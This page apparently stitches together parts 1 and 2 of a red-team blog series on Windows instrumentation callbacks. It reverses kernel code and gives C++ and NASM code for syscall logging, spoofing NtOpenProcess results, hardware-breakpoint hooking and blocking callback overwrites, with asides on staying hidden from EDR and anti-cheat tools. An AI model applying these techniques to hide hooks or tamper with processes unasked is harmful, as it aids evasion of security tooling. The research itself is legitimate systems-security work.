These are not mandatory; however, we use them to make our intentions clearer instead of directly requiring numbers or bit literals to be passed. As mentioned before, there are four debug registers that can contain the address of a breakpoint. Each of these debug registers has separate options that can be set. This allows execution, read, and read and write breakpoints.

Now Dr7, the control register, needs to be set accordingly.

OSDev wiki has a table explaining the structure of Dr7:

Figure 1: https://wiki.osdev.org/CPU_Registers_x86#Debug_Registers

Consultant

Category
Date
Navigation

For each hardware breakpoint we want to set, we need to do three things:

  1. Set Dr0/1/2/3 to the address.
  2. Enable the corresponding local breakpoint for the passed debug_register_t (bits 0–7)
  3. Set the correct condition based on the passed
  4. Set the correct size for the breakpoint. For execute breakpoints, it always needs to be 0.

Steps 1 and 2 can be done using the following code:

bool set_hwbp(debug_register_t reg, void* hook_addr, bp_type_t type, uint8_t len) {
CONTEXT context = { .ContextFlags = CONTEXT_DEBUG_REGISTERS };
if (!GetThreadContext(GetCurrentThread(), &context))
   return false;
if (reg == debug_register_t::Dr0)
   context.Dr0 = reinterpret_cast<DWORD64>(hook_addr);
else if (reg == debug_register_t::Dr1)
   context.Dr1 = reinterpret_cast<DWORD64>(hook_addr);
else if (reg == debug_register_t::Dr2)
   context.Dr2 = reinterpret_cast<DWORD64>(hook_addr);
else
context.Dr3 = reinterpret_cast<DWORD64>(hook_addr);

As the debug registers can’t be directly modified from user mode, we need to use the corresponding Windows APIs (GetThreadContext and SetThreadContext). We then set Dr0/1/2/3 to the hook address.

The steps afterwards become a bit more complicated due to bitwise operations being needed. Additionally, the corresponding bit positions need to be calculated in Dr7.

For brevity’s sake, we added comments to the specific passages instead of explaining it via text:

[…]
// Converts enum type to its underlying type to use it for calculations
auto reg_index = std::to_underlying(reg);
// Enables local breakpoint (bit position 0/2/4/6)
context.Dr7 |= 1ULL << (reg_index * 2);
// Clear and set condition (execute/write/read and write)
context.Dr7 &= ~(0b11ULL << (16 + reg_index * 4));
context.Dr7 |= (std::to_underlying(type) << (16 + reg_index * 4));
// Execution breakpoints always require the length to be 0
if (type == bp_type_t::Execute)
   len = 0;
// Clear and set length
context.Dr7 &= ~(0b11ULL << (18 + reg_index * 4));
context.Dr7 |= (len << (18 + reg_index * 4));
return SetThreadContext(GetCurrentThread(), &context);
}

Now we’ve got everything set up to install a hardware breakpoint. The following snippet can be added to your main function to install a breakpoint on function calls to NtSetInformationProcess:

set_hwbp(debug_register_t::Dr0, nt_set_info_proc, bp_type_t::Execute, 0);

This should crash your program if you call the specified function and have no exception handler that handles the exception.

Modifying the exception handler

Now we only need to make the exception handler handle the exception caused by the hardware breakpoint. For this, we don’t need to touch the IC as it already correctly calls the exception handler; instead, we need to modify the function exception_handler.

First, we need to detect if the exception was caused by one of the debug registers. This can be easily done by checking the rip register for breakpoints caused by execution; however, we also want compatibility with write and read/write breakpoints. These types of breakpoints will contain the address of the operation that tries to access the address within a debug register in rip. Instead of checking rip, we can use Dr6: the debug status register. When a debug register is fired, the bits 0-3 will be set according to which debug register is set. For example, when Dr2 is fired, bit 2 will be set.

The debug registers are luckily included in the ContextRecord member of the EXCEPTION_POINTERS structure passed to VEH handlers. This means, we don’t need to call GetThreadContext again to retrieve it.

Here is an example of how to check which debug register fired:

long exception_handler(EXCEPTION_POINTERS* exception_info) {
if (exception_info->ContextRecord->Dr6 & 1)
   std::println("Dr0 fired");
else if (exception_info->ContextRecord->Dr6 & 2)
   std::println("Dr1 fired");
else if (exception_info->ContextRecord->Dr6 & 4)
   std::println("Dr2 fired");
else if (exception_info->ContextRecord->Dr6 & 8)
   std::println("Dr3 fired");
[…]

Before implementing the actual logic that hinders someone from overwriting an IC, we need to fix the error you’ve most likely ran into if you tried testing that code: the exception keeps firing till the program eventually crashes.

The solution for this is the resume flag; this is a bit in the RFLAGS register. The explanation for this bit can be found in the AMD manual: “[…] The RF bit, when set to 1, temporarily disables instruction breakpoint reporting to prevent repeated debug exceptions (#DB) from occurring. […]”. So, all we need to do is set the resume flag, which is at bit 16 of the RFLAGS register. In user mode, only EFLAGS, i.e. the lower 32 bits of the RFLAGS register, are accessible. The resume flag can be set as follows, with EFLAGS being used instead of RFLAGS because of the aforementioned reasons:

exception_info->ContextRecord->EFlags |= 1 << 16;

After adding that, the code can continue execution even after a hardware breakpoint was triggered.

Forbidding IC registration

We’ve covered everything that’s needed to hinder someone from registering a new IC. The following exception handler only handles a hardware breakpoint set in Dr0. Then, NtSetInformationProcess specific actions are performed: first, we check if the 0x28, the value required to install an IC, is even passed to the function or if NtSetInformationProcess should perform something else than registering an IC. If a new IC should get installed, it is read out and printed. Afterwards, rax, the register that holds the return value, is set to 0 to show that the function call was successful. We then set rip to the address of a ret instruction, so NtSetInformationProcess isn’t executed. You could also manually set up the return, meaning manually adjusting the stack and loading the return address into rip.

long exception_handler(EXCEPTION_POINTERS* exception_info) {
if (!(exception_info->ContextRecord->Dr6 & 1))
   return EXCEPTION_CONTINUE_SEARCH;
exception_info->ContextRecord->EFlags |= 1 << 16;
// Does the call even want to overwrite the IC?
if (exception_info->ContextRecord->Rdx != 0x28)
   return EXCEPTION_CONTINUE_EXECUTION;
const auto instrumentation_info = reinterpret_cast<PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION*>(exception_info->ContextRecord->R8);
std::println("Following IC was going to get set: {}", instrumentation_info->Callback);
// Success
exception_info->ContextRecord->Rax = 0;
exception_info->ContextRecord->Rip = reinterpret_cast<DWORD64>(ret_operation_addr);
return EXCEPTION_CONTINUE_EXECUTION;
}

If you installed your own IC with an exception handler, registered a hardware breakpoint on NtSetInformationProcess and then tried reregistering an IC, you would see prints by your own exception handler, which shows that the IC registration was blocked. You can verify that your IC wasn’t overwritten by trying to register a new IC multiple times: if the prints still show up, this of course means your IC is still active.

Closing words

In this blog you learned how to do very basic hooking with ICs, but this is by no means all you can do with ICs in terms of hooking. The benefit of the chosen design, i.e. your IC calling an exception handler with a set up EXCEPTION_POINTERS structure, is that it is compatible with the regular format of exception handlers required for VEH. Anything you can get to work with VEH you can get to work with the IC implementation of it, with the main benefit being that no other exception handlers are called due to the VEH being entirely skipped.

You could, for example, also hook data reads and writes by changing the hardware breakpoint options. You can also get PAGE_GUARD hooks to work, as they also throw exceptions.

We recommend keeping the restrictions of hardware breakpoints in mind, especially with multi-threaded programs.

Instead of blocking NtSetInformationProcess calls that want to register new ICs, you could block the NtSetInformationProcess call and then call the IC that should be set from within your own IC to make the user/program that tried registering the IC think their IC was successfully added, but your IC is still set, and you can filter what is passed to the other IC.

It is also possible to pass through calls to hooked functions from within your hook, but you need to disable the hardware breakpoints or pass through the exceptions to make it work as normal.

A little hint: think about the restrictions of using a flag to enable and disable your IC – what happens if someone sets a hardware breakpoint in your IC?

In the next part of this series, you will learn how you can use ICs to inject shellcode into other processes. After that, in the last part of this series, we will look at ICs from a more theoretical standpoint: what is possible with them, what isn’t and how can programs detect if an IC is set.

Further blog articles

AD Security

Microsoft Defender for Identity evasions in 2026 – Part II

June 17, 2026 – The first blogpost highlighted the detection capabilities and the resulting evasion options for Microsoft Defender for Identity (DfI). To complement the first part, the second part will present some alternative detection possibilities for the defensive side to improve visibility and security, as well as the upgrade from DfI version 2.2 to DfI version 3.0.

Author: Jakob Scholz

Mehr Infos »
Red Teaming

Windows Instrumen­tation Call­backs – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco

Mehr Infos »
Reverse Engineering

Windows Instrumen­tation Call­backs – Part 3

January 28, 2026 – In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Author: Lino Facco

Mehr Infos »
Blog

Loader Dev. 4 – AMSI and ETW

April 30, 2024 – In the last post, we discussed how we can get rid of any hooks placed into our process by an EDR solution. However, there are also other mechanisms provided by Windows, which could help to detect our payload. Two of these are ETW and AMSI.

Author: Kolja Grassmann

Mehr Infos »
Blog

Loader Dev. 1 – Basics

February 10, 2024 – This is the first post in a series of posts that will cover the development of a loader for evading AV and EDR solutions.

Author: Kolja Grassmann

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.

Windows Instrumen­tation Callbacks – Part 1

Search

Windows Instrumen­tation Callbacks – Part 1

November 5, 2025

Windows Instrumentation Callbacks Part 1

Introduction

This multi-part blog series will be discussing an undocumented feature of Windows: instrumentation callbacks (ICs).

In the first part of the blog, you will learn how ICs are implemented and how you can use them to log and spoof syscalls without setting any hooks.

In the second part, you will learn how to use ICs for patchless hooking without registering or executing any exception handlers.

Disclaimer

  • This series is aimed towards readers familiar with x86_64 assembly, computer concepts such as the stack and Windows internals. Not every term will be explained in this series.
  • This blog post will teach you how to set ICs on Windows 10 and 11; for older Windows versions, the API for setting an IC is different.
  • This series is aimed at x64 programs. We will not be discussing setting instrumentation callbacks on WoW64 processes, i.e. processes running through the x86 compatibility layer.

Credits

This blog post is based on the research of multiple people, most notably Alex Ionescu and his Hooking Nirvana presentation at Recon 2015. We recommend watching that presentation as he also shows other interesting hooking techniques.

dx9’s blog post about Hyperion (an anti-cheat) and wave (a cheat), which both utilize instrumentation callbacks, was also very informative.

Additionally, we want to thank ph3r0x for telling us about ICs and about the differences in WoW64 processes.

What are instrumentation callbacks?

A callback is a function that is passed to another function which then executes the callback function at a certain event or condition.

Instrumentation refers to the process of modifying a program to allow analysis of it.

In simple terms, an instrumentation callback instruments a program so that the specified callback function is executed on kernel-to-user-mode returns. According to Alex Ionescu, instrumentation callbacks are used by Microsoft in internal tools such as iDNA, which is apparently used for time travel tracing and for TruScan. We cannot confirm that; however, there is a mention of iDNA and TruScan in this Microsoft research paper.

The more thorough explanation of the inner workings of instrumentation callbacks is as follows: ICs are a process-specific user mode callback to system traps, for example syscalls or exceptions like access violations. Once a trap is triggered, a switch to kernel mode occurs to handle the trap. If an IC is set, the kernel will return to the IC instead of the original return point. This means, the IC is the first execution step back in user mode after the trap was executed. The IC is also responsible for continuing the program flow, as otherwise the program would crash or yield. For this purpose, the kernel passes the original return point in a CPU register as we will find out by reversing later.

For visualization, let’s trace the flow of a typical Windows API call. Please note that the kernel part of this diagram is by no means complete; the diagram is meant to show the execution flow with and without an instrumentation callback; it’s not meant to teach you the inner workings of the kernel. If that interests you, we recommend the explanation of the Windows syscall handler by hammertux.

Figure 1: Exemplary OpenProcess call without IC

Consultant

Category
Date
Navigation

With an IC set, this flow would look as follows:

Figure 2: Exemplary OpenProcess call with IC

You might be wondering why we are jumping to r10. We will get to that in the next chapter.

example.exe refers to the memory region of that process; the IC does not need to be a part of the original program’s binary; it can be added dynamically at runtime.

Looking at that diagram, it might become more obvious how powerful ICs are. The kernel returns right to our code, before even the ret instruction after the syscall is executed: our IC is the first code to be executed after the kernel returns to user mode. We will discuss what can be done with that later. Let’s first check out how the IC is handled by the kernel.

Reversing

KiSetupForInstrumentationReturn

ntoskrnl.exe includes a function called KiSetupForInstrumentationReturn. Let’s check out what this function does; as one could guess by the name, it has something to do with ICs. 

mov rax, qword [gs:0x188]
mov rdx, qword [rax+0xb8]
mov r8, qword [rdx+0x3d8]
test r8, r8
jne 0x140482a86
retn

Let’s go through this step by step.

Line 1: At the start of the gs register in the kernel, the Kernel Processor Control Region (KPCR) structure is located. At an offset of 0x180 of that structure, a member structure called Kernel Processor Control Block (KPRCB) is located. So, by accessing gs:0x188, we access the KPRCB structure member at an offset of 8. At offset 8 of the KPRCB, the CurrentThread member of type KTHREAD* is located, which is dereferenced. So, after the first operation, the register rax holds the address of the start of the current thread’s KTHREAD structure.

Line 2: This operation loads the base of the KPROCESS processes into rdx. This might not fit the KTHREAD structure definition before mentioned; however, if we disassemble PsGetCurrentProcess, we will see the same operations.

Line 3-6: At an offset of 0x3d8 of the KPROCESS structure, the InstrumentationCallback member is located, which gets moved into r8 and tested to check if it is null. If it is null, the function returns. As rax still holds the the start of the current thread’s KTHREAD structure, this is what the function returns.

The following disassembly gets executed if an IC is set:

cmp word [rcx+0x170], 0x33
jne 0x14036d228
mov rax, qword [rcx+0x168]
mov qword [rcx+0x58], rax
mov qword [rcx+0x168], r8
retn

Now the parameter passed to KiSetupInstrumentationReturn in rcx is used: it’s the address of the base of the KTRAP_FRAME structure of the trap – you will just have to believe us on that one 😉

Line 1-2: This check is done to verify that the trap didn’t originate from a WoW64 program by checking the SegCs member of KTRAP_FRAME. For 64-bit programs, it should equal 0x33; for programs executed through the WoW64 compatibility layer, this is most likely 0x23. We’d recommend you check out this blog article by Marcus Hutchins if you are interested in an explanation.

Line 3-4: TRAP_FRAME.r10 is set to KTRAP_FRAME.rip. To clarify, the trap frame/the register members of that structure hold the values the thread had when the trap occurred in user mode. Meaning KTRAP_FRAME.rip does not hold a kernel address but one in userland.

Line 5: KTRAP_FRAME.rip is set to KPROCESS.InstrumentationCallback, which was already moved into r8 before.

Now we know that r10 will hold the actual instruction pointer and saw how the IC is implemented. By checking the cross-references to that function, the following functions show up: KiInitializeUserApc, KiDispatchException, KeRaiseUserException, KiRaiseException. Additionally, an unnamed function shows up. This gives us hints to what we can catch with ICs.

We now know we somehow need to set KPROCESS.InstrumentationCallback; however, this is obviously a kernel structure, which we can’t directly set from user mode.

NtSetInformationProcess

Of course there is a function to set KPROCESS.InstrumentationCallback from user mode, as otherwise this blog post would not exist. As mentioned before, we did not reverse ntoskrnl ourselves to find this function; that credit goes to Alex Ionescu.

NtSetInformationProcess is a common syscall that does multiple things; it receives the same parameters as its kernelbase counterpart SetProcessInformation. The second parameter is an enum called ProcessInformationClass that specifies the operation to execute.

With the knowledge of the Nirvana Hooking presentation by Alex Ionescu, finding the relevant code in NtSetInformationProcess is easy. Within the function, a switch case on the second parameter, the ProcessInformationClass enum, is performed. Case 0x28 is what is relevant for us to set an IC.

For brevity, we will not be going through the entirety of the function. If you are interested in looking at it yourself, you can find it in ntoskrnl.exe at NtSetInformationProcess+0x1b42.

Right after validating the passed handle, a call to PsGetCurrentProcess and SeSinglePrivilegeCheck with SeDebugPrivilege passed as parameter is made.

Then, a big if statement (NtSetInformationProcess+0x1c2b) is opened, which checks if the return value of SeSinglePrivilegeCheck is true or if an unknown variable is equal to PsGetCurrentProcess. This lets us guess we require the SeDebugPrivilege to set an IC on other processes, but we don’t need it to set it on our own process.

At NtSetInformationProcess+0x1d09, we see a familiar looking offset: 0x3d8. This is the line where our IC gets set.

This logic can be represented by the following shortened pseudo code:

struct PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION {
ULONG Version;
ULONG Reserved;
PVOID Callback;
};
NTSTATUS NtSetInformationProcess(HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, [...]) {
  switch (ProcessInformationClass) {
      // [...]
      case 0x28:
          NTSTATUS status = ObReferenceObjectByHandle(ProcessHandle, PROCESS_SET_INFORMATION, PsProcessType, [...]);
          if (status < 0)
              return status;
            KPROCESS current_process = PsGetCurrentProcess();
          bool has_debug_priv = SeSinglePrivilegeCheck(SeDebugPrivilege, KPRCB[0x232]);
if (!has_debug_priv && requested_process != current_process)
              return STATUS_PRIVILEGE_NOT_HELD;
          if (IsWow64Process(requested_process))
              return STATUS_NOT_SUPPORTED;
            void* ic_address = ProcessInformation.Callback;
        // IC Sanity checks
          // [...]
        // KPROCESS structure
          requested_process.InstrumentationCallback = ic_address;
            // [...]
        }
  }

Setting up a basic IC

Now that we have partially reversed KiSetupForInstrumentationReturn and NtSetInformationProcess we know the following things:

  • An IC can be set from user mode with NtSetInfomationProcess.
    • ProcessInformationClass needs to be set to 0x28.
    • If we want to set an IC on another process, we need to have the SeDebugPrivilege.
  • When the IC is executed, r10 will hold the original rip.

For a successful NtSetInformationProcess call, the following struct needs to be passed as ProcessInformation parameter. We will also need the type definition of NtSetInformationProcess.

struct PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION {
ULONG Version;
ULONG Reserved;
PVOID Callback;
};

Only the Callback member matters to us, the other two need to be set to 0. You can try setting Callback to a function pointer; however, you will not be very successful as the stack was not set up for a function call. The Callback member should instead point to some assembly code. This assembly code, which we will call the bridge, needs to do the following:

  1. Save the registers
  2. Set up a function call
  3. Restore stack and registers after function call
  4. Jump to r10 as that holds the actual address the code should resume at.

Depending on what you want to use your IC for, you will most likely trigger syscalls from within the IC itself. This would cause an infinite recursion, as the IC would be called again when the syscall is triggered; thus, we will also need an option to disable the IC for the current thread.

Let’s try setting up a very simple IC that will trigger a breakpoint on a kernel to usermode return.

Setting the IC

The following is our exemplary code to set an IC. You will of course need to have a function definition for NtSetInformationProcess.

#include <print>
#include <Windows.h>
extern "C" void instrumentation_bridge();
extern "C" void instrumentation_callback() {
  __debugbreak();
}

int main()

PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION instrumentation_info{};
  instrumentation_info.Callback = reinterpret_cast<void*>(&instrumentation_adapter);
  const auto nt_set_info_proc = reinterpret_cast<NtSetInformationProcess_t>(GetProcAddress(GetModuleHandle("ntdll.dll"), "NtSetInformationProcess"));
  if (!nt_set_info_proc) {
    std::println("Could not resolve NtSetInformationProcess");
    return false;
  }
  auto status = nt_set_info_proc(GetCurrentProcess(), static_cast<_PROCESS_INFORMATION_CLASS>(0x28), &instrumentation_info, sizeof(instrumentation_info));
  if (status) {
    std::println("NtSetInformationProcess returned {:x}", status);
  } else {
    std::println("Successfully installed instrumentation callback");
  }

extern “C” is used to disable C++ name mangling and instead use C style linkage.

With the line extern “C” void instrumentation_bridge(); we are linking to our not-yet-written assembly bridge.

instrumentation_callback is the function we want to call through our assembly bridge. For now, we just set a breakpoint there, as we will not be implementing a flag to avoid recursion just yet.

Writing the assembly bridge

For writing the assembly bridge, we’ll be using NASM. If you are using MASM or another assembler, you will of course need to adjust the assembly accordingly.

We will start by pushing the registers, setting up the function call, calling it and then undoing our changes. After that, we will jump to r10 to continue the execution flow. There are multiple ways you can save the current registers, either you just push them to the stack, save them to a structure or call Windows functions doing that for you. Please note that the following snippets do not save, for example, the floating-point registers.

extern instrumentation_callback
section .code
global instrumentation_adapter
instrumentation_adapter:
pushfq
push rax
push rbx
push rcx
push rdx
push rdi
push rsi
push r8
push r9
push r10
push r11
push r12
push r13
push r14
push r15
push rbp
mov rbp, rsp
sub rsp, 0x20
call instrumentation_callback
add rsp, 0x20
pop rbp
pop r15
pop r14
pop r13
pop r12
pop r11
pop r10
pop r9
pop r8
pop rsi
pop rdi
pop rdx
pop rcx
pop rbx
pop rax
popfq
jmp r10

By running the program with an attached debugger, you should now trigger the breakpoint in the C++ code. This means, our function is correctly called. However, we obviously want to do more with our callback than trigger a breakpoint, but for that we will need to implement a check to avoid infinite recursion as the IC would be executed for every syscall, even if the syscall was made by the IC itself.

This flag should be thread-local, as otherwise we would not catch syscall executions in other threads while our IC in one thread is executing.

For this purpose, we’ll be misusing the legacy member InstrumentationCallbackDisabled of the Thread Environment Block (TEB). This is, at least in x64 versions, no longer used. There are smarter ways of implementing such a check, for example with Thread Local Storage, as using the InstrumentationCallbackDisabled member is an obvious giveaway to EDRs/ACs that something weird is going on.

If you look at the structure of the TEB, you will see InstrumentationCallbackDisabled is located at 0x1b8. The idea is that once the IC is triggered, InstrumentationCallbackDisabled gets set to 1 (true) and then our C++ function is executed. If that functions triggers syscalls, they will not call the function again because before that our assembly bridge will check if InstrumentationCallbackDisabled is set to 1 (true). If it is, it continues execution. Once our C++ function is over and the assembly bridge restores the registers, the flag will be cleared.

To do this, the following assembly can be used. The first part before the dots is meant to be added right after the pushfq, and the bottom part is meant to replace everything after pop rax.

  mov rcx, gs:[30h] ; TEB
  add rcx, 1b8h ; TEB->InstrumentationCallbackDisabled 
cmp byte [rcx], 1
  je _ret
  […]
  mov rcx, qword gs:[30h] ; TEB
  add rcx, 1b8h ; TEB->InstrumentationCallbackDisabled
  mov byte [rcx], 0
_ret:
  popfq
  jmp r10

The careful eye might’ve noticed something: with this code we are no longer backing up and restoring rcx. Why’s that?

If you attach a debugger to a program, place a breakpoint on the instruction after a syscall and trigger it, you will see the address of the instruction after the syscall being in rcx. If you do the same with an IC, you will see that the address of the IC is in rcx. If you wanted to hide the existence of your IC, this would obviously be counterproductive. Fixing this, is not part of this article and will not be covered here

We would also recommend checking the value of r10 with and without an IC set.

Logging and spoofing syscalls

Let’s recap: by now we can execute our own C/C++ function after every exception and make syscalls from within it. This is cool; however, we can’t do specific things for certain executed syscalls, as we do not have access to the executed syscalls’ address in our C++ function. Let’s fix this and while we are it, let’s pass even more parameters that will be useful to us. In total we are planning to add three parameters giving us the address of the syscall that was executed, the return value and the original stack pointer. Why the original stack pointer is interesting will be explained shortly.

As mentioned before, there are different ways of saving the registers and different ways of passing information to your function. If you saved the registers in, for example, a CONTEXT structure, you could just pass that to your IC.

Let’s first change our function definition to add the three parameters. Additionally, it would be nice to change the return value of syscalls.

Like specified in the windows x64 calling convention, return values are passed in the rax register. When a syscall is made and the IC is triggered, rax will hold the return value of the syscall. By changing the return type of the instrumentation_callback function from void to uint64_t we can easily overwrite the return value of the syscall by returning another value from our C++ code as rax is overwritten by that.

After implementing those changes, the instrumentation_callback function looks as follows:

uint64_t instrumentation_callback(uint64_t original_rsp, uint64_t 
return_addr, uint64_t return_val) {
__debugbreak();
}

Now we need to adjust the assembly bridge. We can use rcx to store the original stack pointer, as we do not need to back up rcx because of the reasons mentioned before.

extern instrumentation_callback
section .code
global instrumentation_adapter
instrumentation_adapter:
  mov rcx, rsp
  pushfq
push rcx
  mov rcx, gs:[30h] ; TEB
  add rcx, 1b8h ; TEB->InstrumentationCallbackDisabled 
cmp byte [rcx], 1
  pop rcx
  je _ret
  […]
  push rbp
  mov rbp, rsp
  sub rsp, 0x20
  ; rcx already contains the stack pointer
  mov rdx, r10
  mov r8, rax
  call instrumentation_callback
  add rsp, 0x20
  pop rbp
  […]

This should trigger the placed breakpoint in our C++ code and shows that the parameters contain the correct values.

Logging syscalls

To log syscalls with their function name, we will use the dbghelp library, which you need to link against.

Additionally, the following code needs to get added to the start of main to allocate a console and initialize the symbol handler.

[…] 
if (!AllocConsole())
    return -1;

FILE* fp;
freopen_s(&fp, "CONOUT$", "w", stdout);
freopen_s(&fp, "CONIN$", "r", stdin);
freopen_s(&fp, "CONERR$", "w", stderr);
SymSetOptions(SYMOPT_UNDNAME);
if (!SymInitialize(reinterpret_cast<HANDLE>(-1), nullptr, TRUE)) {   
std::println("SymInitialize failed");
 return -1;
  }
[…]

The following instrumentation_callback function then prints out all the called function names, their address, the displacement from the function start and the return value.

extern "C" uint64_t instrumentation_callback(uint64_t original_rsp, uint64_t return_addr, uint64_t return_val) {
std::array<byte, sizeof(SYMBOL_INFO) + MAX_SYM_NAME> buffer{ 0 };
const auto symbol_info = reinterpret_cast<SYMBOL_INFO*>(buffer.data());
symbol_info->SizeOfStruct = sizeof(SYMBOL_INFO);
symbol_info->MaxNameLen = MAX_SYM_NAME;
uint64_t displacement = 0;
if (!SymFromAddr(reinterpret_cast<HANDLE>(-1), return_addr, &displacement, symbol_info)) {
   printf("[-] SymFromAddr failed: %lu", GetLastError());
    return return_val;
}
  if (symbol_info->Name)
   printf("[+] %s+%llu \n\t- Returns: %llu\n\t- Return address: %llu\n", symbol_info->Name, displacement, return_val, return_addr);
  return return_val;
}

This functionality is obviously the most useful if the project is a DLL and not an EXE, as it can then be injected into a process to see which syscalls the program triggers.

Spoofing syscalls

Let’s now start doing cool stuff with our IC: as ICs are the first code being executed in user mode after a syscall, we can spoof its return values from our IC.

For this example, our test program will be using OpenProcess to open a handle to another process. Our IC will then retrieve the opened handle from the stack, close it and then return ACCESS_DENIED.

Our IC only gets a callback to NtOpenProcess, which is called by OpenProcess, not to OpenProcess itself. Let’s look at the function definitions for both functions:

HANDLE OpenProcess(
[in] DWORD dwDesiredAccess,
[in] BOOL  bInheritHandle,
  [in] DWORD dwProcessId
);
NTSTATUS NtOpenProcess(
[out]          PHANDLE            ProcessHandle,
[in]           ACCESS_MASK        DesiredAccess,
[in]           POBJECT_ATTRIBUTES ObjectAttributes,
[in, optional] PCLIENT_ID         ClientId
);

As we can see, rax, the register containing the return value of the syscall, will hold a NTSTATUS value and not the handle. First, we need to check if NtOpenProcess was executed without an error and then we need to retrieve the handle from the stack for which we need a stack offset.

As OpenProcess returns a HANDLE, we know the required logic to retrieve the handle is already implemented in OpenProcess after the NtOpenProcess function call.

Let’s reverse OpenProcess in kernelbase to retrieve the offset:

[…]
call qword [rel NtOpenProcess]
nop dword [rax+rax]
test eax, eax
js 0x1800338c5
mov rax, qword [rsp+0x88]
add rsp, 0x68
retn

Most of the function is not important for us; we just need to check how the handle gets loaded into rax. This is done through the operation mov rax, qword [rsp+0x88], so we know that if we have the stack pointer of the OpenProcess function, the handle is at an offset of 0x88. Our original_rsp parameter holds the stack pointer of NtOpenProcess, not OpenProcess. This means that the top of the stack holds the address NtOpenProcess should return to in OpenProcess. Therefore, we need to add eight to that value of 0x88 to access the handle.

You might understand now why we added an original_rsp parameter to our C++ function. We could still access the handle from the function with inline assembly; however, every time we add, for example, a local variable in our C++ function, we would need to recalculate our offset to the handle, as a bigger stack frame would be allocated for our function.

Let’s recap what we require to spoof the handle access:

  1. We need to calculate the return address of the NtOpenProcess
  2. We need to check if the return address is that of the ret operation of NtOpenProcess.
  3. We should check the value of rax. If it contains a non-zero value NtOpenProcess
  4. We need to change the handle at the offset of 0x90 of the original stack pointer to INVALID_HANDLE_VALUE.
  5. We need to change the return value to STATUS_ACCESS_DENIED (0xC0000022).

As we can now do this in C++, this is very easy and can be done with the following code:

extern "C" uint64_t instrumentation_callback(uint64_t original_rsp, uint64_t return_addr, uint64_t return_val) {
static uint64_t nt_open_proc;
  if (!nt_open_proc) {
   nt_open_proc =
reinterpret_cast<uint64_t>(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtOpenProcess"));
   if (!nt_open_proc)
     return return_val;
    nt_open_proc += 20;
}
if (return_addr != nt_open_proc)
   return return_val;
if (return_val != 0)
   return return_val;
auto handle_ptr = reinterpret_cast<HANDLE*>(original_rsp +  0x90);
if (*handle_ptr == INVALID_HANDLE_VALUE)
   return return_val;
  std::println("[+] IC: Detected program NtOpenProcess call: {}", *handle_ptr);
CloseHandle(*handle_ptr);
  std::println("[+] IC: Closed opened handle and spoofing Access denied");
  *handle_ptr = INVALID_HANDLE_VALUE;
  return 0xC0000022; // Access denied NTSTATUS value
}

To test this, let’s open a handle to a process with and without an IC set. For this example, we’ll be using notepad.exe as a test program. As OpenProcess requires a process ID, we have also added a basic process ID enumeration function.

#include <tlhelp32.h>
[…]
uint32_t get_process_id(const std::string_view& process_name) {
PROCESSENTRY32 proc_entry{ .dwSize = sizeof(PROCESSENTRY32) };
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
  if (snapshot == INVALID_HANDLE_VALUE)
   return 0;
if (!Process32First(snapshot, &proc_entry))
   return 0;
  do {
   if (std::string{ proc_entry.szExeFile } != process_name)
     continue;
   CloseHandle(snapshot);
   return proc_entry.th32ProcessID;
} while (Process32Next(snapshot, &proc_entry));  CloseHandle(snapshot);
return 0;
}
int main()
{
PROCESS_INSTRUMENTATION_CALLBACK_INFORMATION instrumentation_info{};
instrumentation_info.Callback = reinterpret_cast<void*>(&instrumentation_adapter);
  const auto nt_set_info_proc = reinterpret_cast<NtSetInformationProcess_t>(GetProcAddress(GetModuleHandle("ntdll.dll"), "NtSetInformationProcess"));
if (!nt_set_info_proc) {
   std::println("Could not resolve NtSetInformationProcess");
   return -1;
}
  const auto pid = get_process_id("notepad.exe");
if (pid == 0) {
   std::println("Could not find notepad.exe");
   return -1;
}
  auto handle = OpenProcess(GENERIC_ALL, 0, pid);
  if (handle != INVALID_HANDLE_VALUE)
   std::println("Successfully opened process handle: {}", handle);
else
   std::println("Failed opening process handle: {}", handle);
CloseHandle(handle);
  auto status = nt_set_info_proc(GetCurrentProcess(), static_cast<_PROCESS_INFORMATION_CLASS>(0x28), &instrumentation_info, sizeof(instrumentation_info));
if (status) {
   std::println("NtSetInformationProcess returned {:x}", status);
} else {
   std::println("Successfully installed instrumentation callback");
}
  handle = OpenProcess(GENERIC_ALL, 0, pid);
  if (handle != INVALID_HANDLE_VALUE)
   std::println("Successfully opened process handle: {}", handle);
else
   std::println("Failed opening process handle: {}", handle);
CloseHandle(handle);
}

Executing the code with a working IC should result in one successful and one failed OpenProcess call if notepad.exe is running.

Of course, OpenProcess was just used as an example. This can be done with every syscall.

Closing words

In this blog you learnt how ICs work and how they can be used to log and spoof syscalls from user mode. ICs can be utilized for much more; in the upcoming blogs you will learn how to inject shellcode into other processes and how you can hook function calls with ICs to, for example, prevent users from overwriting your own IC. In a more theoretical part of the series we will discuss other use cases of ICs and possible counter measures.

Further blog articles

AD Security

Microsoft Defender for Identity evasions in 2026 – Part II

June 17, 2026 – The first blogpost highlighted the detection capabilities and the resulting evasion options for Microsoft Defender for Identity (DfI). To complement the first part, the second part will present some alternative detection possibilities for the defensive side to improve visibility and security, as well as the upgrade from DfI version 2.2 to DfI version 3.0.

Author: Jakob Scholz

Mehr Infos »
Red Teaming

Windows Instrumen­tation Call­backs – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco

Mehr Infos »
Reverse Engineering

Windows Instrumen­tation Call­backs – Part 3

January 28, 2026 – In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Author: Lino Facco

Mehr Infos »
Command-and-Control

Beacon Object Files for Mythic – Part 3

